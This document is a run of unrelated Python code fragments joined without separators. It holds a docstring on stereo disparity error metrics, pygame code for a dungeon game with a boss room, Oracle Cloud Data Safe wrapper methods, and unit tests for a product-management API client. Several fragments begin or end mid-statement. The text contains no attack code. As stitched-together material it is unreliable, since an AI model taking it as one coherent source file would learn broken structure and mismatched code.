num_pixels_bg: Number of pixels in the background region. num_pixels_fg: Number of pixels in the foreground region. num_pixels_bg_est: Number of pixels in the background region. Counts only the estimated disparities (no interpolation). num_pixels_fg_est: Number of pixels in the foreground region. Counts only the estimated disparities (no interpolation). num_errors_bg:THD: Counts the number of disparity errors (bad pixels) in the background regions using: bad_pixels = (abs_err > abs_error_thresh) & (rel_err > rel_error_thresh), where abs_err = np.abs(pred_disparity - gt_disparity), rel_err = abs_err / gt_disparity, abs_error_thresh (THD) is one of 10, 5, or 3 pixels, and rel_error_thresh is 0.1 (10%). num_errors_fg:THD: Counts the number of disparity errors (bad pixels) in the foreground regions. num_errors_bg_est:THD: Counts the number of disparity errors (bad pixels) in the foreground regions. Counts only the estimated pixels (no interpolation). num_errors_fg_est:THD: Counts the number of disparity errors (bad pixels) in the foreground regions. Counts only the estimated pixels (no interpolation). Dummy test images (3 x 3): pred = np.array([[ 2.0, 4.0, 10.0], [ 70.0, 60.0, 50.0], [150.0, 120.0, 190.0]], dtype=np.float32) gt = np.array([[ 1.0, 5.0, 10.0], [ 50.0, 70.0, 90.0], [100.0, 150.0, 200.0]], dtype=np.float32) gt_obj = np.array([[0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]], dtype=np.float32) pred is the predicted disparity map, gt is the ground-truth disparity map, and gt_obj is the ground-truth disparity map for foreground objects. The dummy data should produce the following results: num_pixels_bg: 9 pixels because the dummy gt disparity map is 3 x 3 and all pixels have valid disparities. num_pixels_fg: 0 pixels because the dummy gt_obj has
self.rect.y == 64 or self.rect.y == (HEIGHT - 256): if self.direction == 1: self.direction = 3 elif self.direction == 2: self.direction = 4 elif self.direction == 3: self.direction = 1 elif self.direction == 4: self.direction = 2 self.timer += 1 else: self.vx, self.vy = 0, 0 if self.wait != 50: self.wait += 1 if self.wait == 25: self.shoot_projectiles() elif self.wait == 49: self.shoot_projectiles() else: self.wait = 0 self.timer = 0 self.playercenter = self.player.getCenter() self.boss_projectiles.update() self.rotatetowardsPlayer() self.random_timer = random.randint(20, 25) self.stimer += self.random_timer # This is where you a able to adjust the # animation time, for the cycles of the pictures. if (self.stimer % 5) == 0: self.index += 1 if self.index >= len(self.imgindex): self.index = 0 self.image = self.imgindex[self.index] def rotatetowardsPlayer(self): self.angle_vec = math.atan2((self.rect.center[0] - self.playercenter[0]),(self.rect.center[1] - self.playercenter[1])) # The angle is converted from radians to degrees self.angle = math.degrees(self.angle_vec) self.newimage = pg.transform.rotate(self.image, self.angle - 180) oldcenter = self.rect.center self.newrect = self.newimage.get_rect() self.newrect.center = oldcenter def shoot_projectiles(self): self.boss_center = self.rect.center self.newproj = Projectile(self.boss_center[0], self.boss_center[1], self.playercenter[0] + 128, self.playercenter[1] + 128, 10, self.screen, 2) self.boss_projectiles.add(self.newproj) # Object added to a group self.newproj = Projectile(self.boss_center[0], self.boss_center[1], self.playercenter[0], self.playercenter[1], 10, self.screen, 2) self.boss_projectiles.add(self.newproj) # Object added to a group self.newproj = Projectile(self.boss_center[0], self.boss_center[1], self.playercenter[0] - 128, self.playercenter[1] - 128, 10, self.screen, 2) self.boss_projectiles.add(self.newproj) # Object added to a group def Boss_AttackCycle(self): if self.direction == 2: self.vx, self.vy = 4, 4 self.vx *= -1 self.vy *= -1 if self.direction == 1: self.vx, self.vy = -4, -4 self.vx *= -1 self.vy *= -1 if self.direction == 3: self.vx, self.vy = -4, 4 self.vx *= -1 self.vy *= -1 if self.direction == 4: self.vx, self.vy = 4, -4 self.vx *= -1 self.vy *= -1 def draw(self): self.percentage = self.health / 1200 xcoord = self.percentage * 512 if self.health != 0: self.boss_projectiles.draw(self.screen) pg.draw.rect(self.screen,(0, 0, 0),[253, 13, 518, 38]) pg.draw.rect(self.screen,(95, 99, 88),[256, 16, 512, 32]) pg.draw.rect(self.screen,(227, 2, 43),[256, 16, xcoord, 32]) try: self.screen.blit(self.newimage, self.newrect) except: self.screen.blit(self.image, self.rect) # Creating an object which inherits from the class Room class BossRoom(Room): def __init__(self, RoomNum, player, screen, direction, prevdirection): # Super allows the parameters to be # taken from the Room class while allowing to # have its own __init__ to add differnt # more specific parameters. super().__init__(RoomNum, player, screen, direction, prevdirection) self.boss_group = pg.sprite.Group() self.AddBoss() self.player = player self.boss_dead = False self.winimage = pg.image.load("winscreen.png").convert_alpha() def AddBoss(self): # Add the boss to the room self.Boss = Boss(448, 320, self.player) self.boss_group.add(self.Boss) def update(self, projectile): # Updating the bossroom and the projectile in it super(BossRoom, self).update(projectile) self.collidedwithdoor = self.player.update(self.walls, self.closeddoors, self.closedExitDoors, self.doors, self.ExitDoors, self.enemies, self.items, self.Boss.boss_projectiles, self.boss_group) if self.collidedwithdoor == 1: for projectile in self.proj: projectile.kill() self.player.LoadInto_NewMap(self.doordirection) return 1 if self.collidedwithdoor == 2: for projectile in self.proj: projectile.kill() self.player.LoadInto_OldMap(self.prevdoordirection) return 2 # Check to see if the boss is dead if len(self.boss_group) == 0: self.boss_dead = True def draw(self): # Draw procedure for the boss room super(BossRoom, self).draw() self.screen = maingame.returnGameScreen() if self.boss_dead == True: # Draw the win screen once boss is beaten self.screen.blit(self.winimage, (0,0)) else: self.walls.draw(self.screen) self.Boss.draw() self.screen = maingame.returnGameScreen() class Game: def __init__(self): # initializing the main object pg.init() self.screen = pg.display.set_mode((WIDTH, HEIGHT)) pg.display.set_caption("Dungeon Game") self.clock = pg.time.Clock() self.bg = pg.image.load("back.png").convert_alpha() self.RoomNum = 0 def gameintro(self): # load intro screen self.image = pg.image.load("intropic.png") timer = 0 intro_stage = True while intro_stage == True: for event in pg.event.get(): if event.type == pg.QUIT: self.quitGame() if event.type == pg.MOUSEBUTTONUP: intro_stage = False if timer < 250: self.screen.fill((255,255,255)) if timer == 250: self.screen.fill((209, 209, 209)) if timer == 500: self.screen.fill((161, 161, 161)) if timer == 750: self.screen.fill((112, 112, 112)) if timer >= 1000: self.screen.fill((89, 89, 89)) self.screen.blit(self.image, (32,32)) timer += 1 pg.display.flip() def deathscreen(self): # load death screen self.image = pg.image.load("deathscreen.png") timer = 0 intro_stage = True while intro_stage == True: for event in pg.event.get(): if event.type == pg.QUIT: self.quitGame() if timer < 250: self.screen.fill((255,255,255)) if timer == 250: self.screen.fill((209, 209, 209)) if timer == 500: self.screen.fill((161, 161, 161)) if timer == 750: self.screen.fill((112, 112, 112)) if timer >= 1000: self.screen.fill((89, 89, 89)) self.screen.blit(self.image, (32,32)) timer += 1 pg.display.flip() def CheckforOppositeDoorDirection(self): # checking what the opposite door direction is if self.doordirection == 1: self.doordirection = random.randint(1, 4) if self.doordirection == 2: self.doordirection += 1 elif self.doordirection == 2: self.doordirection = random.randint(1, 4) if self.doordirection == 1: self.doordirection += 1 elif self.doordirection == 3: self.doordirection = random.randint(1, 4) if self.doordirection == 4: self.doordirection -= 2 elif self.doordirection == 4: self.doordirection = random.randint(1, 4) if self.doordirection == 3: self.doordirection -= 2 def CreateNewGame(self): # Creating new sprite groups self.projectiles = pg.sprite.Group() self.player_group = pg.sprite.Group() #Initilizing the player into the game # with coordinates as parameters self.player = PlayerSprite(512, 384) self.player_group.add(self.player) self.doordirection = random.randint(1, 4) self.exitdoor2 = self.doordirection # Initializing each room in the game self.Room_0 = Room(self.RoomNum, self.player, self.screen, self.doordirection, 0) self.CheckforOppositeDoorDirection() self.exitdoor3 = self.doordirection self.Room_1 = Room(self.RoomNum + 1, self.player, self.screen,self.doordirection, self.exitdoor2) self.CheckforOppositeDoorDirection() self.exitdoor4 = self.doordirection self.Room_2 = Room(self.RoomNum + 2, self.player, self.screen,self.doordirection, self.exitdoor3) self.CheckforOppositeDoorDirection() self.exitdoor5 = self.doordirection self.Room_3 = Room(self.RoomNum + 3, self.player, self.screen,self.doordirection, self.exitdoor4) self.CheckforOppositeDoorDirection() self.exitdoor6 = self.doordirection self.Room_4 = Room(self.RoomNum + 4, self.player, self.screen,self.doordirection, self.exitdoor5) self.CheckforOppositeDoorDirection() self.Room_5 = BossRoom(self.RoomNum +5, self.player, self.screen,0,self.exitdoor6 ) def returnGameScreen(self): self.screen = self.screen return self.screen # Returns the game's screen def drawBackground(self): self.screen.blit(self.bg, (0,0)) def MainGameLoop(self): self.gameRunning = True # Main Game Loop while self.gameRunning: # Setting the clock tick rate to 60 ticks self.clock.tick(60) self.getEvents() self.update() self.CreateImage() def CreateImage(self): # Drawing sub-section of the main loop self.drawBackground() # Each room has a different object with # different data to keep the # data in that room's required 'data pack' self.projectiles.draw(self.screen) if self.RoomNum == 0: self.Room_0.draw() elif self.RoomNum == 1: self.Room_1.draw() elif self.RoomNum == 2: self.Room_2.draw() elif self.RoomNum == 3: self.Room_3.draw() elif self.RoomNum == 4: self.Room_4.draw() elif self.RoomNum == 5: self.player.draw() self.Room_5.draw() if self.RoomNum != 5: self.player.draw() # Flips the display at the end to change the image pg.display.flip() def AimLine(self): # Testing attribute to visually see the vector # of the player's aim pg.draw.line(self.screen, (0, 0, 0), (self.mousex, self.mousey), (self.PLAYERCENTER)) def DrawGrid(self): # Draws a grid with gives a reference for testing for i in range(0, WIDTH, TILESIZE): pg.draw.line(self.screen, (0, 0, 0), (i, 0), (i, HEIGHT)) for j in range(0, HEIGHT, TILESIZE): pg.draw.line(self.screen, (0, 0, 0), (0, j), (WIDTH, j)) def getEvents(self): self.PLAYERCENTER = self.player.getCenter() self.mousex, self.mousey = pg.mouse.get_pos() for event in pg.event.get(): self.mouse = pg.mouse.get_pressed() if event.type == pg.MOUSEBUTTONUP: if event.button == 1: # Doesn't allow more than 5 projectiles on # screen at once if len(self.projectiles) < 5: # Creates new projectile object self.newproj = Projectile(self.PLAYERCENTER[0], self.PLAYERCENTER[1], self.mousex, self.mousey, 15, self.screen, 1) self.projectiles.add(self.newproj) # Object added to a group # When the top right cross is clicked, the # program closes if event.type == pg.QUIT: self.quitGame() def update(self): # Check to see if the player is dead if self.player.health <= 0: self.gameRunning = False self.projectiles.update() # Update section for all rooms if self.RoomNum == 0: if self.Room_0.update(self.projectiles) == 1: self.RoomNum = 1 elif self.RoomNum == 1: door1 = self.Room_1.update(self.projectiles) if door1 == 1: self.RoomNum = 2 if door1 == 2: self.RoomNum -= 1 elif self.RoomNum == 2: door2 = self.Room_2.update(self.projectiles) if door2 == 1: self.RoomNum = 3 if door2 == 2: self.RoomNum -= 1 elif self.RoomNum == 3: door3 = self.Room_3.update(self.projectiles) if door3 == 1: self.RoomNum = 4 if door3 == 2: self.RoomNum -= 1 elif self.RoomNum == 4: door4 = self.Room_4.update(self.projectiles) if door4 == 1: self.RoomNum = 5 if door4 == 2: self.RoomNum -= 1 elif self.RoomNum == 5: if self.Room_5.update(self.projectiles)
getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states, **waiter_kwargs ) result_to_return = waiter_result return result_to_return except Exception as e: raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e) def resume_audit_trail_and_wait_for_state(self, audit_trail_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}): """ Calls :py:func:`~oci.data_safe.DataSafeClient.resume_audit_trail` and waits for the :py:class:`~oci.data_safe.models.WorkRequest` to enter the given state(s). :param str audit_trail_id: (required) The OCID of the audit trail. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.data_safe.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.data_safe.DataSafeClient.resume_audit_trail` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait """ operation_result = self.client.resume_audit_trail(audit_trail_id, **operation_kwargs) if not wait_for_states: return operation_result lowered_wait_for_states = [w.lower() for w in wait_for_states] wait_for_resource_id = operation_result.headers['opc-work-request-id'] try: waiter_result = oci.wait_until( self.client, self.client.get_work_request(wait_for_resource_id), evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states, **waiter_kwargs ) result_to_return = waiter_result return result_to_return except Exception as e: raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e) def retrieve_audit_policies_and_wait_for_state(self, audit_policy_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}): """ Calls :py:func:`~oci.data_safe.DataSafeClient.retrieve_audit_policies` and waits for the :py:class:`~oci.data_safe.models.WorkRequest` to enter the given state(s). :param str audit_policy_id: (required) Unique audit policy identifier. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.data_safe.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.data_safe.DataSafeClient.retrieve_audit_policies` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait """ operation_result = self.client.retrieve_audit_policies(audit_policy_id, **operation_kwargs) if not wait_for_states: return operation_result lowered_wait_for_states = [w.lower() for w in wait_for_states] wait_for_resource_id = operation_result.headers['opc-work-request-id'] try: waiter_result = oci.wait_until( self.client, self.client.get_work_request(wait_for_resource_id), evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states, **waiter_kwargs ) result_to_return = waiter_result return result_to_return except Exception as e: raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e) def set_security_assessment_baseline_and_wait_for_state(self, security_assessment_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}): """ Calls :py:func:`~oci.data_safe.DataSafeClient.set_security_assessment_baseline` and waits for the :py:class:`~oci.data_safe.models.WorkRequest` to enter the given state(s). :param str security_assessment_id: (required) The OCID of the security assessment. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.data_safe.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.data_safe.DataSafeClient.set_security_assessment_baseline` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait """ operation_result = self.client.set_security_assessment_baseline(security_assessment_id, **operation_kwargs) if not wait_for_states: return operation_result lowered_wait_for_states = [w.lower() for w in wait_for_states] wait_for_resource_id = operation_result.headers['opc-work-request-id'] try: waiter_result = oci.wait_until( self.client, self.client.get_work_request(wait_for_resource_id), evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states, **waiter_kwargs ) result_to_return = waiter_result return result_to_return except Exception as e: raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e) def set_user_assessment_baseline_and_wait_for_state(self, user_assessment_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}): """ Calls :py:func:`~oci.data_safe.DataSafeClient.set_user_assessment_baseline` and waits for the :py:class:`~oci.data_safe.models.WorkRequest` to enter the given state(s). :param str user_assessment_id: (required) The OCID of the user assessment. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.data_safe.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.data_safe.DataSafeClient.set_user_assessment_baseline` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait """ operation_result = self.client.set_user_assessment_baseline(user_assessment_id, **operation_kwargs) if not wait_for_states: return operation_result lowered_wait_for_states = [w.lower() for w in wait_for_states] wait_for_resource_id = operation_result.headers['opc-work-request-id'] try: waiter_result = oci.wait_until( self.client, self.client.get_work_request(wait_for_resource_id), evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states, **waiter_kwargs ) result_to_return = waiter_result return result_to_return except Exception as e: raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e) def start_audit_trail_and_wait_for_state(self, start_audit_trail_details, audit_trail_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}): """ Calls :py:func:`~oci.data_safe.DataSafeClient.start_audit_trail` and waits for the :py:class:`~oci.data_safe.models.WorkRequest` to enter the given state(s). :param oci.data_safe.models.StartAuditTrailDetails start_audit_trail_details: (required) Details for the starting audit. :param str audit_trail_id: (required) The OCID of the audit trail. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.data_safe.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.data_safe.DataSafeClient.start_audit_trail` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait """ operation_result = self.client.start_audit_trail(start_audit_trail_details, audit_trail_id, **operation_kwargs) if not wait_for_states: return operation_result lowered_wait_for_states = [w.lower() for w in wait_for_states] wait_for_resource_id = operation_result.headers['opc-work-request-id'] try: waiter_result = oci.wait_until( self.client, self.client.get_work_request(wait_for_resource_id), evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states, **waiter_kwargs ) result_to_return = waiter_result return result_to_return except Exception as e: raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e) def stop_audit_trail_and_wait_for_state(self, audit_trail_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}): """ Calls :py:func:`~oci.data_safe.DataSafeClient.stop_audit_trail` and waits for the :py:class:`~oci.data_safe.models.WorkRequest` to enter the given state(s). :param str audit_trail_id: (required) The OCID of the audit trail. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.data_safe.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.data_safe.DataSafeClient.stop_audit_trail` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait """ operation_result = self.client.stop_audit_trail(audit_trail_id, **operation_kwargs) if not wait_for_states: return operation_result lowered_wait_for_states = [w.lower() for w in wait_for_states] wait_for_resource_id = operation_result.headers['opc-work-request-id'] try: waiter_result = oci.wait_until( self.client, self.client.get_work_request(wait_for_resource_id), evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states, **waiter_kwargs ) result_to_return = waiter_result return result_to_return except Exception as e: raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e) def unset_security_assessment_baseline_and_wait_for_state(self, security_assessment_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}): """ Calls :py:func:`~oci.data_safe.DataSafeClient.unset_security_assessment_baseline` and waits for the :py:class:`~oci.data_safe.models.WorkRequest` to enter the given state(s). :param str security_assessment_id: (required) The OCID of the security assessment. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.data_safe.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.data_safe.DataSafeClient.unset_security_assessment_baseline` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait """ operation_result = self.client.unset_security_assessment_baseline(security_assessment_id, **operation_kwargs) if not wait_for_states: return operation_result lowered_wait_for_states = [w.lower() for w in wait_for_states] wait_for_resource_id = operation_result.headers['opc-work-request-id'] try: waiter_result = oci.wait_until( self.client, self.client.get_work_request(wait_for_resource_id), evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states, **waiter_kwargs ) result_to_return = waiter_result return result_to_return except Exception as e: raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e) def unset_user_assessment_baseline_and_wait_for_state(self, user_assessment_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}): """ Calls :py:func:`~oci.data_safe.DataSafeClient.unset_user_assessment_baseline` and waits for the :py:class:`~oci.data_safe.models.WorkRequest` to enter the given state(s). :param str user_assessment_id: (required) The OCID of the user assessment. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.data_safe.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.data_safe.DataSafeClient.unset_user_assessment_baseline` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait """ operation_result = self.client.unset_user_assessment_baseline(user_assessment_id, **operation_kwargs) if not wait_for_states: return operation_result lowered_wait_for_states = [w.lower() for w in wait_for_states] wait_for_resource_id = operation_result.headers['opc-work-request-id'] try: waiter_result = oci.wait_until( self.client, self.client.get_work_request(wait_for_resource_id), evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states, **waiter_kwargs ) result_to_return = waiter_result return result_to_return except Exception as e: raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e) def update_alert_and_wait_for_state(self, alert_id, update_alert_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}): """ Calls :py:func:`~oci.data_safe.DataSafeClient.update_alert` and waits for the :py:class:`~oci.data_safe.models.Alert` acted upon to enter the given state(s). :param str alert_id: (required) The OCID of alert. :param oci.data_safe.models.UpdateAlertDetails update_alert_details: (required)
self.assertDataSent("ProductID", self.PRODUCT_ID) def test_passed_new_stock_level_is_sent(self): """Test the passed new stock level is sent.""" self.assertDataSent("newStockLevel", self.NEW_STOCK_LEVEL) def test_passed_old_stock_level_is_sent(self): """Test the passed old stock level is sent.""" self.assertDataSent("oldStockLevel", self.OLD_STOCK_LEVEL) class Test_set_product_vat_rate_Method(TestCCAPIMethod): """Test the CCAPI.set_product_vat_rate method.""" RESPONSE = test_requests.TestUpdateProductVatRate.RESPONSE PRODUCT_IDS = ["123654", "6909316"] VAT_RATE = 20 VAT_RATE_ID = VatRates.get_vat_rate_id_by_rate(VAT_RATE) def setUp(self): """Make test request.""" super().setUp() self.register_request(requests.UpdateProductVatRate, text=self.RESPONSE) def test_passed_product_ID_is_sent(self): """Test that the passed product IDs are sent.""" CCAPI.set_product_vat_rate(product_ids=self.PRODUCT_IDS, vat_rate=self.VAT_RATE) sent_data = self.get_sent_request_data() for product_id in self.PRODUCT_IDS: self.assertIn(product_id, str(sent_data["prodids"])) def test_passing_single_product_ID_as_string(self): """Test passing a single product ID as a string.""" CCAPI.set_product_vat_rate( product_ids=self.PRODUCT_IDS[0], vat_rate=self.VAT_RATE ) sent_data = self.get_sent_request_data() self.assertIn(self.PRODUCT_IDS[0], str(sent_data["prodids"])) def test_vat_rate_ID_is_sent(self): """Test the correct VAT rate ID is sent.""" CCAPI.set_product_vat_rate(product_ids=self.PRODUCT_IDS, vat_rate=self.VAT_RATE) self.assertDataSent("vatrate", self.VAT_RATE_ID) class Test_upload_image_Method(TestCCAPIMethod): """Test the CCAPI.upload_image method.""" RESPONSE = test_requests.TestUploadImage.SUCCESSFUL_RESPONSE PRODUCT_IDS = ["123654", "6909316"] IMAGE = test_requests.TestUploadImage.IMAGE def setUp(self): """Make test request.""" super().setUp() self.register_request(requests.UploadImage, json=self.RESPONSE) def test_passed_product_ID_is_sent(self): """Test that the passed product IDs are sent.""" CCAPI.upload_image(product_ids=self.PRODUCT_IDS, image_file=self.IMAGE) sent_data = self.get_sent_request_query() for product_id in self.PRODUCT_IDS: self.assertIn(product_id, str(sent_data["prodids"])) def test_passing_single_product_ID_as_string(self): """Test passing a single product ID as a string.""" CCAPI.upload_image(product_ids=self.PRODUCT_IDS, image_file=self.IMAGE) sent_data = self.get_sent_request_query() self.assertIn(self.PRODUCT_IDS[0], str(sent_data["prodids"])) class Test_create_range_Method(TestCCAPIMethod): """Test the CCAPI.create_range method.""" RANGE_ID = "4940634" GET_SKU_RESPONSE = test_requests.TestProductOperations.GENERATE_SKU_RESPONSE RANGE_NAME = "New Product Range" SKU = "JF8-98D-3KD" def setUp(self): """Register request URIs.""" super().setUp() self.register_request(requests.AddNewRange, text=self.RANGE_ID) self.register_request(requests.ProductOperations, json=self.GET_SKU_RESPONSE) def test_create_range_returns_a_range_ID(self): """Test the CCAPI.create_range method returns a range ID.""" response = CCAPI.create_range(self.RANGE_NAME, self.SKU) self.assertEqual(response, self.RANGE_ID) def test_create_range_sends_range_name(self): """Test the CCAPI.create_range method sends a range name.""" CCAPI.create_range(self.RANGE_NAME, self.SKU) self.assertDataSent("RangeName", self.RANGE_NAME) def test_create_range_sends_SKU(self): """Test the CCAPI.create_range method sends a SKU.""" CCAPI.create_range(self.RANGE_NAME, self.SKU) self.assertDataSent("SKUCode", self.SKU) def test_gets_generated_SKU(self): """Test a request is made for a new SKU.""" CCAPI.create_range(self.RANGE_NAME) self.assertRequestUsesRequestClassURI( requests.ProductOperations, self.get_sent_request(skip=2) ) def test_generated_SKU_is_used(self): """Test that the generated SKU is sent.""" CCAPI.create_range(self.RANGE_NAME) self.assertDataSent("SKUCode", "RNG_" + self.GET_SKU_RESPONSE["Data"]) class Test_add_option_to_product_Method(TestCCAPIMethod): """Test the ccapi.CCAPI.add_option_to_product method.""" RESPONSE = test_requests.TestAddRemProductOption.RESPONSE RANGE_ID = "4940634" OPTION_ID = "32131" def setUp(self): """Register request URI.""" super().setUp() self.register_request(requests.AddRemProductOption, text=self.RESPONSE) CCAPI.add_option_to_product(range_id=self.RANGE_ID, option_id=self.OPTION_ID) def test_add_option_to_product_sends_range_ID(self): """Test the CCAPI.add_option_to_product method sends a Range ID.""" self.assertDataSent("prdid", self.RANGE_ID) def test_add_option_to_product_sends_option_ID(self): """Test the CCAPI.add_option_to_product method sends an option ID.""" self.assertDataSent("optid", self.OPTION_ID) def test_add_option_to_product_sends_act(self): """Test the CCAPI.add_option_to_product method sends a correct act.""" self.assertDataSent("act", "add") class Test_remove_option_from_product_Method(TestCCAPIMethod): """Test the ccapi.CCAPI.remove_option_from_product method.""" RESPONSE = test_requests.TestAddRemProductOption.RESPONSE RANGE_ID = "4940634" OPTION_ID = "32131" def setUp(self): """Register request URI.""" super().setUp() self.register_request(requests.AddRemProductOption, text=self.RESPONSE) CCAPI.remove_option_from_product( range_id=self.RANGE_ID, option_id=self.OPTION_ID ) def test_remove_option_from_product_sends_range_ID(self): """Test the remove_option_from_product method sends a Range ID.""" self.assertDataSent("prdid", self.RANGE_ID) def test_remove_option_from_product_sends_option_ID(self): """Test the remove_option_from_product method sends an option ID.""" self.assertDataSent("optid", self.OPTION_ID) def test_remove_option_from_product_sends_act(self): """Test the remove_option_from_product method sends a correct act.""" self.assertDataSent("act", "rem") class Test_get_sales_channels_for_range_Method(TestCCAPIMethod): """Test the ccapi.CCAPI.get_sales_channels_for_range method.""" RESPONSE = test_data.CHECK_RANGES_ON_SALES_CHANNEL_RESULT RANGE_ID = "4940634" def setUp(self): """Register request URI.""" super().setUp() self.register_request(requests.CheckRangesOnSalesChannel, json=self.RESPONSE) def test_get_sales_channels_for_range_sends_range_id(self): """Test the method uses the correct request class.""" CCAPI.get_sales_channels_for_range(self.RANGE_ID) self.assertDataSent("rangeid", self.RANGE_ID) def test_get_sales_channel_for_range_returns_list(self): """Test the method returns a list.""" response = CCAPI.get_sales_channels_for_range(self.RANGE_ID) self.assertIsInstance(response, list) def test_get_sales_channel_for_range_returns_sales_channels(self): """Test the method returns a list.""" response = CCAPI.get_sales_channels_for_range(self.RANGE_ID) self.assertIsInstance(response[0], cc_objects.SalesChannel) class Test_delete_range_Method(TestCCAPIMethod): """Test the ccapi.CCAPI.delete_range method.""" RESPONSE = test_requests.TestDeleteProductRange.RESPONSE RANGE_ID = "4940634" def setUp(self): """Register request URI.""" super().setUp() self.register_request(requests.DeleteProductRange, text=self.RESPONSE) CCAPI.delete_range(self.RANGE_ID) def test_delete_range_sends_range_id(self): """Test the delete_range method sends the passed range ID.""" self.assertDataSent("ProdRangeID", self.RANGE_ID) class Test_set_range_option_drop_down_Method(TestCCAPIMethod): """Test the ccapi.CCAPI.set_range_option_drop_down method.""" RESPONSE = test_requests.TestSetOptionSelect.RESPONSE RANGE_ID = "4355752" OPTION_ID = "32129" DROP_DOWN = True def setUp(self): """Register request URI.""" super().setUp() self.register_request(requests.SetOptionSelect, text=self.RESPONSE) CCAPI.set_range_option_drop_down( range_id=self.RANGE_ID, option_id=self.OPTION_ID, drop_down=self.DROP_DOWN ) def test_sends_range_ID(self): """Test the set_range_option_drop_down method sends a range ID.""" self.assertDataSent("prdid", self.RANGE_ID) def test_sends_option_ID(self): """Test the set_range_option_drop_down method sends an option ID.""" self.assertDataSent("optid", self.OPTION_ID) def test_sends_drop_down_status(self): """Test the method sends a drop down status.""" self.assertDataSent("onoff", int(self.DROP_DOWN)) class Test_update_range_on_sales_channel_Method(TestCCAPIMethod): """Test the update_range_on_sales_channel method.""" RESPONSE = [] RANGE_ID = "4355752" REQUEST_TYPE = "select" ACT = "update" VALUE = "Test Value" OPTION_ID = "32129" CHANNEL_IDS = ["3541", "3557"] def setUp(self): """Register request URI and call method.""" super().setUp() self.register_request(requests.UpdateRangeOnSalesChannel, 